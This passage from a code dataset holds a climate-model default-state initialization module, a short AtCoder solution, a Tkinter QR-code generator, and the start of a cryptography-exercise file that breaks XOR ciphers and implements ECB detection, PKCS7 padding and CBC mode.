'longwave_heating_rate_assuming_clear_sky': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'K day^-1',\n 'default_value': 0.\n },\n 'upwelling_longwave_flux_in_air': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'upwelling_longwave_flux_in_air_assuming_clear_sky': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'downwelling_longwave_flux_in_air': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'downwelling_longwave_flux_in_air_assuming_clear_sky': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'shortwave_heating_rate': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'K day^-1',\n 'default_value': 0.\n },\n 'shortwave_heating_rate_assuming_clear_sky': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'K day^-1',\n 'default_value': 0.\n },\n 'upwelling_shortwave_flux_in_air': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'upwelling_shortwave_flux_in_air_assuming_clear_sky': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'downwelling_shortwave_flux_in_air': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'downwelling_shortwave_flux_in_air_assuming_clear_sky': {\n 'dims': ['x', 'y', 'interface_levels'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'surface_upward_sensible_heat_flux': {\n 'dims': ['x', 'y'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'surface_upward_latent_heat_flux': {\n 'dims': ['x', 'y'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'upward_heat_flux_at_ground_level_in_soil': {\n 'dims': ['x', 'y'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'heat_flux_into_sea_water_due_to_sea_ice': {\n 'dims': ['x', 'y'],\n 'units': 'W m^-2',\n 'default_value': 0.\n },\n 'precipitation_amount': {\n 'dims': ['x', 'y'],\n 'units': 'kg m^-2',\n 'default_value': 0.\n },\n 'convective_precipitation_amount': {\n 'dims': ['x', 'y'],\n 'units': 'kg m^-2',\n 'default_value': 0.\n },\n 'stratiform_precipitation_amount': {\n 'dims': ['x', 'y'],\n 'units': 'kg m^-2',\n 'default_value': 0.\n },\n 'precipitation_rate': {\n 'dims': ['x', 'y'],\n 'units': 'm s^-1',\n 'default_value': 0.\n },\n 'convective_precipitation_rate': {\n 'dims': ['x', 'y'],\n 'units': 'm s^-1',\n 'default_value': 0.\n },\n 'stratiform_precipitation_rate': {\n 'dims': ['x', 'y'],\n 'units': 'm s^-1',\n 'default_value': 0.\n },\n 'atmosphere_convective_mass_flux': {\n 'dims': ['x', 'y'],\n 'units': 'kg m^-2 s^-1',\n 'default_value': 0.\n },\n 'atmosphere_convective_available_potential_energy': {\n 'dims': ['x', 'y'],\n 'units': 'J kg^-1',\n 'default_value': 0.\n },\n 'convective_heating_rate': {\n 'dims': ['x', 'y', 'mid_levels'],\n 'units': 'K day^-1',\n 'default_value': 0.\n },\n 'zenith_angle': {\n 'dims': ['x', 'y'],\n 'units': 'radians',\n 'default_value': 0.\n },\n 'land_ice_thickness': {\n 'dims': ['x', 'y'],\n 'units': 'm',\n 'default_value': 0.\n },\n 'sea_ice_thickness': {\n 'dims': ['x', 'y'],\n 'units': 'm',\n 'default_value': 0.\n },\n 'surface_snow_thickness': {\n 'dims': ['x', 'y'],\n 'units': 'm',\n 'default_value': 0.\n },\n 'ocean_mixed_layer_thickness': {\n 'dims': ['x', 'y'],\n 'units': 'm',\n 'default_value': 50.\n },\n 'soil_layer_thickness': {\n 'dims': ['x', 'y'],\n 'units': 'm',\n 'default_value': 50.\n },\n 'soil_thermal_capacity': {\n 'dims': ['x', 'y'],\n 
'units': 'J kg^-1 degK^-1',\n        'default_value': 2000.\n    },\n    'area_type': {\n        'dims': ['x', 'y'],\n        'units': 'dimensionless',\n        'default_value': 'sea',\n        'dtype': 'a100'\n    },\n    'snow_and_ice_temperature_spline': {\n        'dims': ['x', 'y'],\n        'units': 'degK',\n        'default_value': CubicSpline(\n            np.linspace(0, 50, 50), 260.*np.ones(50)),\n        'dtype': object\n    },\n    'sea_water_density': {\n        'dims': ['x', 'y'],\n        'units': 'kg m^-3',\n        'default_value': 1.029e3\n    },\n    'surface_albedo_for_direct_shortwave': {\n        'dims': ['x', 'y'],\n        'units': 'dimensionless',\n        'default_value': 0.06\n    },\n\n    'surface_albedo_for_diffuse_shortwave': {\n        'dims': ['x', 'y'],\n        'units': 'dimensionless',\n        'default_value': 0.06\n    },\n\n    'surface_albedo_for_direct_near_infrared': {\n        'dims': ['x', 'y'],\n        'units': 'dimensionless',\n        'default_value': 0.06\n    },\n\n    'surface_albedo_for_diffuse_near_infrared': {\n        'dims': ['x', 'y'],\n        'units': 'dimensionless',\n        'default_value': 0.06\n    },\n    'soil_type': {\n        'dims': ['x', 'y'],\n        'units': 'dimensionless',\n        'default_value': 'clay',\n        'dtype': 'a100'\n    },\n    'surface_roughness_length': {\n        'dims': ['x', 'y'],\n        'units': 'dimensionless',\n        'default_value': 0.0002,\n    },\n    'surface_drag_coefficient_for_heat_in_air': {\n        'dims': ['x', 'y'],\n        'units': 'dimensionless',\n        'default_value': 0.0012,\n    },\n    'surface_drag_coefficient_for_momentum_in_air': {\n        'dims': ['x', 'y'],\n        'units': 'dimensionless',\n        'default_value': 0.0012,\n    },\n    'soil_temperature': {\n        'dims': ['x', 'y', 'mid_levels'],\n        'units': 'degK',\n        'default_value': 274.,\n    },\n}\n\n\ndef get_default_state(component_list,\n                      x={}, y={}, mid_levels={}, interface_levels={},\n                      initial_state={}):\n    \"\"\"\n    Return a state dictionary required to run the model.\n\n    The model comprises the components in :code:`component_list`. If coordinate\n    values in :code:`x`, :code:`y`, :code:`mid_levels` and :code:`interface_levels`\n    are not provided, a single column\n    centered at 0 degrees south, 0 degrees east, with 30 vertical levels is returned.\n\n    Args:\n        component_list (iterable): The components for which a default\n            state is required, in the order that they are called.\n            It is assumed that each component's diagnostic outputs are updated\n            into the state, which is then passed on to the next component. The\n            function will attempt to determine required inputs from this series\n            of components.\n\n        x (dict,optional): A dictionary containing keys :code:`label`, :code:`values`,\n            and :code:`units`. :code:`label` refers to the name the coordinate axis will assume.\n            :code:`values` refers to the array of coordinate values. :code:`units` refers to the\n            units of the coordinate values.\n            If :code:`x` is an empty dictionary, a single default value of 0 degrees longitude\n            is used.\n\n        y (dict,optional): A dictionary containing keys :code:`label`, :code:`values`,\n            and :code:`units`. :code:`label` refers to the name the coordinate axis will assume.\n            :code:`values` refers to the array of coordinate values. :code:`units` refers to the\n            units of the coordinate values.\n            If :code:`y` is an empty dictionary, a single default value of 0 degrees latitude\n            is used.\n\n        mid_levels (dict,optional): A dictionary containing keys :code:`label`, :code:`values`,\n            and :code:`units`. :code:`label` refers to the name the coordinate axis will assume.\n            :code:`values` refers to the array of coordinate values. 
:code:`units` refers to the\n units of the coordinate values.\n If :code:`mid_levels` is an empty dictionary, 30 levels of arbitrary units are used.\n\n interface_levels (dict,optional): A dictionary containing keys :code:`label`, :code:`values`,\n and :code:`units`. :code:`label` refers to the name the coordinate axis will assume.\n :code:`values` refers to the array of coordinate values. :code:`units` refers to the\n units of the coordinate values.\n If :code:`interface_levels` is an empty dictionary, 31 levels of arbitrary units are used.\n\n initial_state (dict, optional): A dictionary containing some quantities that will\n also be added to the final output state. Must not contain any quantities that\n the output state will overwrite.\n\n\n Returns:\n default_state (dict):\n A state dictionary containing the requested\n quantities using the provided coordinate state.\n\n Raises:\n ValueError:\n if any of the following conditions are satisfied:\n\n * if :code:`component_list` is empty\n * if the shape of :code:`x['values']` and :code:`y['values']` is not the same\n * if only one of :code:`mid_levels` or :code:`interface_levels` is specified\n * if vertical coordinates are not one dimensional\n * if length of :code:`mid_levels['values']` is not one less than length\n of :code:`interface['values']`\n \"\"\"\n\n if len(component_list) == 0:\n raise ValueError('Component list must contain at least one component')\n\n if (len(mid_levels.keys()) == 0) != (len(interface_levels.keys()) == 0):\n raise ValueError('Both mid and interface levels must be specified')\n\n output_state = {}\n\n # Create 2D coordinate arrays\n if len(x.keys()) == 0:\n x_coordinate_values = np.zeros((1,))\n x_coordinate_label = 'longitude'\n x_coordinate_units = 'degrees_east'\n else:\n x_coordinate_values = x['values']\n x_coordinate_label = x['label']\n x_coordinate_units = x['units']\n\n if len(y.keys()) == 0:\n y_coordinate_values = np.zeros((1,))\n y_coordinate_label = 'latitude'\n y_coordinate_units = 'degrees_north'\n else:\n y_coordinate_values = y['values']\n y_coordinate_label = y['label']\n y_coordinate_units = y['units']\n\n if len(mid_levels.keys()) == 0:\n mid_levels_coordinate_values = np.arange(30)\n mid_levels_coordinate_label = 'mid_levels'\n mid_levels_coordinate_units = ''\n else:\n mid_levels_coordinate_values = mid_levels['values']\n mid_levels_coordinate_label = mid_levels['label']\n mid_levels_coordinate_units = mid_levels['units']\n\n if len(interface_levels.keys()) == 0:\n interface_levels_coordinate_values = np.arange(31)\n interface_levels_coordinate_label = 'interface_levels'\n interface_levels_coordinate_units = ''\n else:\n interface_levels_coordinate_values = interface_levels['values']\n interface_levels_coordinate_label = interface_levels['label']\n interface_levels_coordinate_units = interface_levels['units']\n\n if not x_coordinate_values.ndim == y_coordinate_values.ndim:\n raise ValueError('x and y coordinates must have the same shape')\n\n if mid_levels_coordinate_values.ndim > 1:\n raise ValueError(\n 'vertical coordinate mid_levels must be one dimensional.')\n\n if interface_levels_coordinate_values.ndim > 1:\n raise ValueError(\n 'vertical coordinate interface_levels must be one dimensional.')\n\n if len(mid_levels_coordinate_values) != len(interface_levels_coordinate_values)-1:\n raise ValueError('Interface levels must have one value more than mid levels')\n\n use_2d_coordinate = False\n two_dim_coord_dict = {}\n\n if x_coordinate_values.ndim == 2:\n if not 
x_coordinate_values.shape == y_coordinate_values.shape:\n raise ValueError(\n 'If x and y are 2d coordinates, they must have the same shape')\n\n two_dim_coord_dict[x_coordinate_label] = {}\n two_dim_coord_dict[x_coordinate_label]['values'] = x_coordinate_values\n two_dim_coord_dict[x_coordinate_label]['logical_dims'] = (\n 'logical_x_coordinate', 'logical_y_coordinate')\n two_dim_coord_dict[x_coordinate_label]['units'] = x_coordinate_units\n\n two_dim_coord_dict[y_coordinate_label] = {}\n two_dim_coord_dict[y_coordinate_label]['values'] = y_coordinate_values\n two_dim_coord_dict[y_coordinate_label]['logical_dims'] = (\n 'logical_x_coordinate', 'logical_y_coordinate')\n two_dim_coord_dict[y_coordinate_label]['units'] = y_coordinate_units\n\n output_state['x'] = DataArray(\n x_coordinate_values,\n dims=two_dim_coord_dict[x_coordinate_label]['logical_dims'],\n attrs={\n 'units': two_dim_coord_dict[x_coordinate_label]['units'],\n 'label': x_coordinate_label\n }\n )\n\n output_state['y'] = DataArray(\n y_coordinate_values,\n dims=two_dim_coord_dict[y_coordinate_label]['logical_dims'],\n attrs={\n 'units': two_dim_coord_dict[y_coordinate_label]['units'],\n 'label': y_coordinate_label\n }\n )\n\n x_coordinate_values = np.arange(\n two_dim_coord_dict[x_coordinate_label]['values'].shape[0])\n\n y_coordinate_values = np.arange(\n two_dim_coord_dict[x_coordinate_label]['values'].shape[1])\n\n x_coordinate_label = 'logical_x_coordinate'\n y_coordinate_label = 'logical_y_coordinate'\n\n x_coordinate_units = ''\n y_coordinate_units = ''\n\n use_2d_coordinate = True\n\n x_coordinate = DataArray(\n x_coordinate_values,\n dims=(x_coordinate_label),\n attrs={'units': x_coordinate_units, 'label': x_coordinate_label})\n\n output_state[x_coordinate_label] = x_coordinate\n add_direction_names(x=x_coordinate_label)\n\n y_coordinate = DataArray(\n y_coordinate_values,\n dims=(y_coordinate_label),\n attrs={'units': y_coordinate_units, 'label': y_coordinate_label})\n\n output_state[y_coordinate_label] = y_coordinate\n add_direction_names(y=y_coordinate_label)\n\n mid_levels_coordinate = DataArray(\n mid_levels_coordinate_values,\n dims=(mid_levels_coordinate_label,),\n attrs={'units': mid_levels_coordinate_units,\n 'label': mid_levels_coordinate_label})\n\n output_state[mid_levels_coordinate_label] = mid_levels_coordinate\n output_state['mid_levels'] = mid_levels_coordinate\n add_direction_names(\n z=mid_levels_coordinate_label)\n\n interface_levels_coordinate = DataArray(\n interface_levels_coordinate_values,\n dims=(interface_levels_coordinate_label,),\n attrs={'units': interface_levels_coordinate_units,\n 'label': interface_levels_coordinate_label})\n\n output_state[interface_levels_coordinate_label] = interface_levels_coordinate\n output_state['interface_levels'] = interface_levels_coordinate\n add_direction_names(\n z=interface_levels_coordinate_label)\n\n if not use_2d_coordinate:\n output_state['x'] = x_coordinate\n output_state['y'] = y_coordinate\n\n quantity_list = set()\n temporary_description = copy.deepcopy(climt_quantity_descriptions)\n additional_dimensions = {}\n additional_descriptions = {}\n\n for component in component_list:\n quantity_list = quantity_list.union(set(component.inputs))\n\n if hasattr(component, 'extra_dimensions'):\n ensure_no_shared_keys(additional_dimensions,\n component.extra_dimensions)\n\n for dimension in component.extra_dimensions.keys():\n if component.extra_dimensions[dimension].ndim > 1:\n raise NotImplementedError(\n 'Two dimensional coordinates in extra_dimensions not 
yet supported')\n\n                output_state[dimension] = DataArray(\n                    component.extra_dimensions[dimension], dims=(dimension,))\n                additional_dimensions[dimension] = output_state[dimension]\n\n        if hasattr(component, 'quantity_descriptions'):\n            ensure_no_shared_keys(additional_descriptions,\n                                  component.quantity_descriptions)\n            additional_descriptions.update(component.quantity_descriptions)\n\n    temporary_description.update(additional_descriptions)\n    for name in quantity_list:\n\n        if name in output_state.keys():\n            continue\n\n        output_state[name] = get_default_values(\n            name, x_coordinate, y_coordinate,\n            mid_levels_coordinate,\n            interface_levels_coordinate,\n            initial_state,\n            temporary_description,\n            additional_dimensions)\n\n        if use_2d_coordinate:\n\n            for physical_dimension in two_dim_coord_dict.keys():\n\n                output_state[name].coords[physical_dimension] = (\n                    two_dim_coord_dict[physical_dimension]['logical_dims'],\n                    two_dim_coord_dict[physical_dimension]['values'])\n\n                output_state[name][physical_dimension].attrs['units'] = \\\n                    two_dim_coord_dict[physical_dimension]['units']\n\n    ensure_no_shared_keys(initial_state, output_state)\n    output_state.update(initial_state)\n    if 'time' not in initial_state:\n        output_state['time'] = datetime(1, 1, 1)\n    return output_state\n\n\ndef get_default_values(quantity_name, x, y, mid_levels, interface_levels,\n                       initial_state, quantity_description, additional_dimensions={}):\n    \"\"\"\n    Returns default values for individual quantities.\n\n    Args:\n        quantity_name (string): string corresponding to a quantity in the pre-defined\n            dictionary of names in :code:`quantity_description`.\n\n        x (DataArray): DataArray containing the definition of the x coordinates.\n\n        y (DataArray): DataArray containing the definition of the y coordinates.\n\n        mid_levels (DataArray): DataArray containing the definition of the mid-level z coordinates.\n\n        interface_levels (DataArray): DataArray containing the definition of the interface-level z\n            coordinates. Quantities on interface levels will have a vertical dimension of size\n            :code:`len(mid_levels)+1`.\n\n        initial_state (dict): Dictionary of quantities already supplied by the caller; it is\n            passed through to any :code:`init_func` defined in the description.\n\n        quantity_description (dict): Description of dimensions, units and default values of\n            quantities to be used to create DataArrays.\n\n        additional_dimensions (dict): Dictionary containing names and coordinates of dimensions\n            that are not x,y,z (used for spectral bands in radiative codes, for example).\n\n    \"\"\"\n\n    description = quantity_description[quantity_name]\n\n    dimension_length = {}\n    dimension_length['x'] = x.values.shape[0]\n    dimension_length['y'] = y.values.shape[0]\n    dimension_length['mid_levels'] = len(mid_levels.values)\n    dimension_length['interface_levels'] = len(interface_levels.values)\n\n    mid_level_coords = np.arange(dimension_length['mid_levels'])\n    int_level_coords = np.arange(dimension_length['interface_levels'])\n    full_coords = {}\n    full_coords['x'] = x\n    full_coords['y'] = y\n    full_coords['mid_levels'] = mid_level_coords\n    full_coords['interface_levels'] = int_level_coords\n\n    for dimension in additional_dimensions.keys():\n        dimension_length[dimension] = additional_dimensions[dimension].shape[0]\n        full_coords[dimension] = additional_dimensions[dimension].values\n\n    quantity_dims = list(description['dims'])\n\n    array_dims = [dimension_length[dimension] for dimension in quantity_dims]\n    quantity_coords = [full_coords[dimension] for dimension in quantity_dims]\n\n    # compare dimension labels by equality, not identity\n    quantity_dims = [x.label if elem == 'x' else elem for elem in quantity_dims]\n    quantity_dims = [y.label if elem == 'y' else elem for elem in quantity_dims]\n\n    if 'dtype' in description:\n        dtype = description['dtype']\n    else:\n        dtype = 'float64'\n\n    if 'default_value' in description:\n        if dtype 
in ['a100', object]:\n            quantity_array = np.ones(array_dims, dtype=dtype)\n            quantity_array[:] = description['default_value']\n        else:\n            quantity_array = np.ones(array_dims, order='F', dtype=dtype)*description['default_value']\n    elif 'init_func' in description:\n        quantity_array = description['init_func'](array_dims, quantity_description, initial_state)\n    else:\n        raise ValueError(\n            'Malformed description for quantity {}:\\\n            must contain default_value or init_func'.format(quantity_name))\n\n    return DataArray(quantity_array, dims=quantity_dims,\n                     coords=quantity_coords, attrs={'units': description['units']})\n","repo_name":"rvalenzuelar/climt","sub_path":"climt/_core/initialization.py","file_name":"initialization.py","file_ext":"py","file_size_in_byte":30134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"9147154985","text":"import collections\n\nN = int(input())\nA = list(map(int, input().split()))\n\n\ndef div2(a):\n    while a % 2 == 0:\n        a //= 2\n    return a\n\n\nAx2 = [div2(a) for a in A]\nAx2 = collections.Counter(Ax2)\n\nprint(len(Ax2))\n","repo_name":"mikiya1130/AtCoder","sub_path":"field/contests/abc019/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20837792765","text":"import qrcode\r\nimport tkinter as tk\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog\r\nimport os\r\n#-------------------------------------------------------------------------------------------------------------\r\nclass QRKODYAPICI:\r\n    def __init__(self, root):\r\n        self.root = root\r\n        self.root.title(\"QR KOD YAPICI\")\r\n\r\n        self.data_label = ttk.Label(root, text=\"Veri Girişi:\")\r\n        self.data_label.grid(row=0, column=0, padx=10, pady=10)\r\n\r\n        self.data_entry = ttk.Entry(root)\r\n        self.data_entry.grid(row=0, column=1, padx=30, pady=10)\r\n\r\n        self.file_label = ttk.Label(root, text=\"Dosya Adı:\")\r\n        self.file_label.grid(row=1, column=0, padx=10, pady=10)\r\n\r\n        self.file_entry = ttk.Entry(root)\r\n        self.file_entry.grid(row=1, column=1, padx=30, pady=10)\r\n\r\n        self.generate_button = ttk.Button(root, text=\"QR Kodu Oluştur\", command=self.generate_qr_code)\r\n        self.generate_button.grid(row=2, column=0, columnspan=2, pady=10)\r\n#-------------------------------------------------------------------------------------------------------------\r\n    def generate_qr_code(self):\r\n        data_to_encode = self.data_entry.get()\r\n        file_name = self.file_entry.get()\r\n\r\n        if not data_to_encode or not file_name:\r\n            tk.messagebox.showerror(\"Hata\", \"Lütfen tüm alanları doldurun.\")\r\n            return\r\n#-------------------------------------------------------------------------------------------------------------\r\n        # The \".png\" extension is appended to the file name.\r\n        file_name += '.png'\r\n\r\n        # A QRCode object is created.\r\n        qr = qrcode.QRCode(\r\n            version=1,\r\n            box_size=10,\r\n            border=4,\r\n        )\r\n#-------------------------------------------------------------------------------------------------------------\r\n        # The data is added to the QR code.\r\n        qr.add_data(data_to_encode)\r\n\r\n        # The QR code is generated.\r\n        qr.make()\r\n#-------------------------------------------------------------------------------------------------------------\r\n        # The generated QR code is converted into an image.\r\n        img = qr.make_image(fill_color=\"black\", back_color=\"white\")\r\n\r\n        # The image is saved under the given file name.\r\n        img.save(file_name)\r\n\r\n        # A message is shown to the user confirming the save succeeded.\r\n        tk.messagebox.showinfo(\"TAMAMLANDI!\", f\"QR kod '{file_name}' başarıyla kaydedildi.\")\r\n        \r\n        self.data_entry.delete(0, tk.END)\r\n        self.file_entry.delete(0, tk.END)\r\n#-------------------------------------------------------------------------------------------------------------\r\nif __name__ == \"__main__\":\r\n    root = tk.Tk()\r\n    app = QRKODYAPICI(root)\r\n    root.mainloop()\r\n","repo_name":"ZinedkA/U4_Kare_Kod","sub_path":"U4_Kare_Kod.py","file_name":"U4_Kare_Kod.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42076690456","text":"import base64\nimport re\nfrom itertools import cycle, zip_longest\nfrom collections import defaultdict\nimport sys\nfrom Crypto.Cipher import AES\nfrom Crypto.Util import Counter\nimport struct\nimport codecs\nfrom random import randint, choice\n\ndecode_hex = codecs.getdecoder(\"hex_codec\")\nencode_hex = codecs.getencoder(\"hex_codec\")\n\n# ------------------ Utility Functions ------------------\n\nclass PaddingException(Exception):\n    \"\"\"\n    Thrown when a function expecting a PKCS7-padded string receives a string\n    with invalid padding\n    \"\"\"\n    pass\n\n\ndef _string_from_file(infile):\n    \"\"\"\n    Converts the contents of infile into a single string, sans newlines\n    \"\"\"\n    text = \"\"\n    with open(infile) as f:\n        text = \"\".join(line.strip() for line in f)\n    return text\n\n\ndef _display_hex(raw_hex_str):\n    \"\"\"\n    Python's `hex` function gives us a hex-formatted string, but it leaves a\n    `0x` on the front, and if it's a long, it leaves an `L` on the end. So,\n    we strip those out here\n    \"\"\"\n    return hex(raw_hex_str)[2:].replace(\"L\", \"\")\n\n\ndef _score_chars(word):\n    \"\"\"\n    Assigns an integer 'score' to a string.\n    A higher score indicates it is more likely to be an English phrase.\n    \"\"\"\n    score = 0\n    for char in word:\n        if re.match(\"[A-Za-z ]\", char):\n            score = score+1\n    return score\n\n\n# TODO clean this one up\ndef hamming_distance(string1, string2):\n    \"\"\"\n    Finds the bitwise hamming distance between two b64-encoded strings.\n    \"\"\"\n    diffs = 0\n    for x, y in zip(string1, string2):\n        diffs = diffs + bin((int(encode_hex(bytes(x, 'utf-8'))[0], 16) ^ int(encode_hex(bytes(y, 'utf-8'))[0], 16))).count('1')\n    return diffs / 1.0\n\n\n# From the pydocs: https://docs.python.org/3/library/itertools.html#itertools-recipes\ndef grouper(iterable, n, fillvalue=None):\n    \"Collect data into fixed-length chunks or blocks\"\n    # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx\"\n    args = [iter(iterable)] * n\n    return zip_longest(*args, fillvalue=fillvalue)\n\n\n# ------------------ Main Functions ------------------\n\ndef hex_to_b64(hex_str):\n    \"\"\" Converts a hex-formatted string into b64 bytes \"\"\"\n    return base64.b64encode(decode_hex(hex_str)[0])\n\n\n# TODO this is only used in one test\ndef xor_two_buffers(buffer1, buffer2):\n    \"\"\" Takes two hex-formatted strings and returns a hex-formatted string \"\"\"\n    return _display_hex(int(buffer1, 16) ^ int(buffer2, 16))\n\n\n# TODO squash this into the previous method\ndef xor_two_buffers_mod(buffer1, buffer2):\n    \"\"\" Takes two bytes-like buffers, xors them together, and returns bytes \"\"\"\n    result = []\n    for i, k in zip(buffer1, list(buffer2)):\n        result.append(i ^ k)\n    return bytes(result)\n\n\ndef decode_single_byte_xor_cypher(hex_str, retkey=False):\n    \"\"\"\n    Takes a hex-formatted string which has been encrypted with 
single-byte xor.\n    Returns the decrypted string.\n    If retkey is True, we return [decrypted_string, key_used_to_decrypt]\n    \"\"\"\n    max_score = 0\n    best_match = \"\"\n    for key in range(255):\n        xor_result = [chr(byte ^ key) for byte in list(decode_hex(hex_str)[0])]\n        xor_result = ''.join(xor_result)\n        score = _score_chars(xor_result)\n        if score > max_score:\n            max_score = score\n            best_match = xor_result\n            best_key = key\n    if retkey:\n        return [best_match, best_key]\n    else:\n        return best_match\n\n\ndef detect_single_byte_xor_cypher(infile):\n    \"\"\"\n    Given a file of hex-formatted strings, determine which one has been\n    encrypted with single-byte xor and return it\n    \"\"\"\n    max_score = 0\n    best_match = \"\"\n    with open(infile) as f:\n        for line in f:\n            xor_result = decode_single_byte_xor_cypher(line.rstrip())\n            score = _score_chars(xor_result)\n            if score > max_score:\n                max_score = score\n                best_match = xor_result\n    return best_match.rstrip()\n\n\ndef repeating_key_xor_encrypt(plaintext, key):\n    \"\"\"\n    Given plaintext and key, uses key to encrypt plaintext via repeating XOR\n    and returns the result\n    \"\"\"\n    keychargen = cycle(key)\n    result = \"\"\n    for plainchar in plaintext:\n        # Plainchar is a unicode string. We get the ascii value of that representation,\n        # then XOR it against the next value in the key iterator. Then we find out what the\n        # resultant character is.\n        result = result + str(ord(plainchar) ^ ord(next(keychargen)))\n    return result\n\n\ndef guess_keylength(cyphertext):\n    smallest_so_far = 999999999999999999999\n    true_keylen = None\n    for keysize in range(2, 100):  # Test every key size.\n        chunks = []\n        normalized_distances = []\n        # For each potential key, get four chunks o' bytes that are the size of the key.\n        for keychunknum in range(4):\n            index = keysize*keychunknum\n            chunks.append([cyphertext[x] for x in range(index, index+keysize)])\n\n        for i in range(3):\n            norm_dist = hamming_distance(''.join(chunks[i]), ''.join(chunks[i+1]))\n            normalized_distances.append(norm_dist)  # To self: is the b64 stuff going to screw anything up?\n        avg = float(sum(normalized_distances))/len(normalized_distances)/keysize\n        print(avg)\n        if avg < smallest_so_far:\n            smallest_so_far = avg\n            true_keylen = keysize\n    return true_keylen\n\n\n# This is a \"lazy\" vignere decrypter; it's using brute force.\n# TODO come back and make it less brute-force-y\ndef decrypt_vigenere(infile):\n    cyphertext = _string_from_file(infile)\n    cyphertext = base64.b64decode(cyphertext)\n    max_score = 0\n    best_keylen = 0\n    best_key = \"\"\n    for keylength in range(2, 40):\n\n        # We want to create a block that contains only the first byte of\n        # every block, the second byte of every block, etc, up to KEYLENGTH.\n        blocks = defaultdict(bytes)\n        keylength_cycle = cycle(range(keylength))\n        for byte in cyphertext:\n            # cyphertext is bytes, so each byte here is an int\n            index = next(keylength_cycle)\n            blocks[index] = blocks[index] + bytes([byte])\n        decoded_chunked = \"\"\n\n        totalkey = \"\"\n        for i in range(keylength):\n            value = decode_single_byte_xor_cypher(encode_hex(blocks[i])[0].decode(), retkey=True)\n            decoded_text_chunk = value[0]\n            totalkey = totalkey + chr(value[1])\n            decoded_chunked = decoded_chunked + decoded_text_chunk\n        if _score_chars(decoded_chunked) > max_score:\n            max_score = _score_chars(decoded_chunked)\n            best_keylen = keylength\n            best_key = totalkey\n\n    # We now have the best key.\n    # Use it to decrypt the file.\n    best_key_cycle = cycle(best_key)\n    for byte in cyphertext:\n        sys.stdout.write(chr(byte ^ ord(next(best_key_cycle))))\n\n\n# TODO remove the from_b64 flag\ndef 
aes_128_in_ecb_mode(instring, key, action, from_b64=True):\n \"\"\"\n Allows encrypt or decryption via AES-128 in ECB mode\n If action==\"encrypt\", this encrypts the contents of infile with key and returns the result.\n If action==\"decrypt\", this instead returns the *decrypted* contents of infile.\n Else, returns None.\n \"\"\"\n cyphertext = instring\n cyphertext = cyphertext if not from_b64 else base64.b64decode(cyphertext)\n if action == \"encrypt\":\n return AES.new(key).encrypt(cyphertext)\n elif action == \"decrypt\":\n return AES.new(key).decrypt(cyphertext)\n else:\n return\n\n\ndef detect_ecb(cyphertext):\n \"\"\" Returns True if cyphertext appears to be ECB-encrypted; else False \"\"\"\n sets = []\n for group in grouper(cyphertext, 16):\n sets.append(group)\n if len(set(sets)) < len(sets):\n return True\n return False\n\n\ndef detect_aes_128_in_ecb_mode(infile):\n \"\"\"\n Detects which line in `infile` has been encrypted with AES-128 in ECB mode\n and returns that line.\n\n Note: this returns the FIRST probable ciphered line, not ALL probable\n ciphered lines.\n \"\"\"\n with open(infile) as f:\n for i, line in enumerate(f):\n cyphertext = decode_hex(line.strip())[0]\n # Problem hinted at doing 16 bytes at a time, so let's try that\n if detect_ecb(cyphertext):\n return (\"Line \" + str(i) + \": \" + str(line.strip()))\n\ndef strip_padding(padded_string):\n \"\"\"\n Strips away the PKCS7 padding from a string and returns it. If padding is\n invalid, raises a PaddingException\n \"\"\"\n reversed_input = padded_string[::-1]\n # 01 is valid, 02 02 is valid, 03 03 03 is valid...\n for i in range(1, len(reversed_input)):\n if [val for val in reversed_input[0:i]] == [i for num in range(0,i)]:\n return padded_string[:-i]\n\n\ndef pkcs7_padding(utf8_string, target_blocksize, padding_amount=False):\n \"\"\"\n Takes a string and pads it to target_blocksize length.\n If padding_amount is set, this will instead just add that amount to the end.\n \"\"\"\n bytetext = bytearray(utf8_string)\n if not padding_amount:\n padding_amount = target_blocksize - (len(bytetext) % target_blocksize)\n for i in range(0, padding_amount):\n bytetext.extend(bytes([padding_amount]))\n return bytetext\n\n\n# I found the diagram on the CBC wikipedia article very helpful for this!\n# https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Cipher-block_chaining_.28CBC.29\n# TODO clean this up wow it's super ugly and I bet we're using it again too\n# start by removing from_b64 flag and make iv optional\ndef cbc_mode(instring, key, iv, action, from_b64=True):\n # Read in the string, if it's from a file\n text = instring\n # b64decode the string, if it's in b64 format\n text = base64.b64decode(text) if from_b64 else text\n keysize = len(key)\n iv = iv * keysize\n # In CBC, we'll be XORing each block against the previous block, so:\n prev_block = None\n # This will hold the result of either our decryption or encryption\n modtext = b''\n\n if action == \"encrypt\":\n for group in grouper(text, keysize):\n filtered_group = bytes([0 if i is None else i for i in group])\n # If we're on the first block, XOR against IV; else, XOR against prev_block\n if not prev_block:\n temp_block = xor_two_buffers_mod(filtered_group, iv)\n else:\n temp_block = xor_two_buffers_mod(prev_block, filtered_group)\n # then encrypt & append to modtext\n prev_block = aes_128_in_ecb_mode(temp_block, key, \"encrypt\", 